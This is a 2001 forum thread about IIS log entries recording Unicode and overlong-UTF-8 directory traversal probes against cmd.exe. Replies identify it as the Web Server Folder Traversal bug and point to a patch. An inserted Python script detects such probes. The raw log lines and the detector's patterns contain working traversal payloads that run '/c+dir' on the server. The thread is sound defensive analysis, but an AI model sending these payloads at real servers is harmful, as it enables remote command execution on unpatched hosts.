
Which exploit from this clip in an IIS log?


DVNT1
06-05-2001, 04:25 AM
I'm trying to determine which exploit is being probed for...

#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
2001-06-03 22:35:32 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 190 HTTP/1.0 - - - -
2001-06-03 22:35:32 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
2001-06-03 22:35:44 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 87 60 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 87 20 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 87 10 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 87 10 HTTP/1.0 - - - -
2001-06-03 22:35:49 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 123 30 HTTP/1.0 - - - -
2001-06-03 22:35:49 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 10 HTTP/1.0 - - - -
2001-06-03 22:35:51 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 3 60 HTTP/1.0 - - - -
2001-06-03 22:35:51 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
2001-06-03 22:35:52 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 3 40 HTTP/1.0 - - - -
2001-06-03 22:35:52 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir 404 3 50 HTTP/1.0 - - - -
2001-06-03 22:35:54 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir 404 3 40 HTTP/1.0 - - - -
2001-06-03 22:35:54 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
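A small detector for the kind of probing shown in the log above, added here as an example and not something DVNT1 posted: it reads the W3C extended format from the #Fields header, then flags requests whose ".." is immediately followed by a non-ASCII byte or a %-escape (the separator sent in an encoded form), and requests that end in cmd.exe. The SAMPLE_LOG is constructed with RFC 5737 addresses, modelled on the lines in the thread; a 200 among the hits is what you would look for to tell a failed probe from a served one.

```python
"""Flag Unicode / overlong-UTF-8 traversal probes against cmd.exe in an IIS
W3C extended log. SAMPLE_LOG is constructed (RFC 5737 addresses)."""
import re

SAMPLE_LOG = (
    "#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port "
    "cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status time-taken "
    "cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)\n"
    "2001-06-03 22:35:32 203.0.113.7 - W3SVC1 DVNT1 192.0.2.10 80 GET "
    "/winnt/system32/cmd.exe /c+dir 404 3 190 HTTP/1.0 - - - -\n"
    "2001-06-03 22:35:44 203.0.113.7 - W3SVC1 DVNT1 192.0.2.10 80 GET "
    "/scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 500 87 60 HTTP/1.0 - - - -\n"
    "2001-06-03 22:35:52 203.0.113.7 - W3SVC1 DVNT1 192.0.2.10 80 GET "
    "/scripts/..\xf0\x80\x80\xaf../winnt/system32/cmd.exe /c+dir 404 3 40 HTTP/1.0 - - - -\n"
    "2001-06-03 22:36:10 203.0.113.7 - W3SVC1 DVNT1 192.0.2.10 80 GET "
    "/default.htm - 200 0 15 HTTP/1.0 - - - -\n"
)

# ".." followed by a non-ASCII byte or a %-escape: the separator was sent in
# an encoded form so the path canonicaliser would not recognise "../".
ENCODED_DOTDOT = re.compile(r"\.\.(?:[^\x00-\x7f]|%)")
SHELL_TARGET = re.compile(r"/cmd\.exe$", re.IGNORECASE)

def parse_w3c(text):
    """Rows as dicts keyed by the names in the #Fields header line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def classify(row):
    """Why a request looks like a traversal or command-shell probe."""
    stem = row["cs-uri-stem"]
    reasons = []
    if ENCODED_DOTDOT.search(stem):
        reasons.append("encoded-traversal")
    elif "../" in stem:
        reasons.append("plain-traversal")
    if SHELL_TARGET.search(stem):
        reasons.append("cmd.exe")
    return reasons

def scan(text):
    """Flagged rows; a 200 status here would mean the probe was served."""
    return [{"ip": r["c-ip"], "status": r["sc-status"], "stem": r["cs-uri-stem"],
             "reasons": reasons}
            for r in parse_w3c(text) if (reasons := classify(r))]
```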

smokin1
06-05-2001, 07:20 AM
Hi
Looks like they were trying to exploit the IIS Unicode bug. There was a patch issued in January I think.
Cheers

DVNT1
06-05-2001, 08:29 AM
I thought it might be the “Web Server Folder Traversal” vulnerability (MS00-078) because of the GET involving the string “/../”.

smokin1, I remember reading about a problem with unicode in the description but so far I haven't found it again. Any more details would be appreciated.

smokin1
06-05-2001, 02:56 PM
Hi again..I'm at work, and most of the info I have on that exploit is at home..but here is a partial explanation.
http://www.infowar.com/iwftp/xforce/advise68.shtml

DVNT1
06-05-2001, 04:00 PM
Great! The links to the patches in that article point to the “Web Server Folder Traversal” vulnerability which backs up what I was thinking.

Thanks!

psyklone
06-05-2001, 07:32 PM
yeah, looks like the unicode exploit to me ... that one hit pretty heavy several months back. i hope all is well ...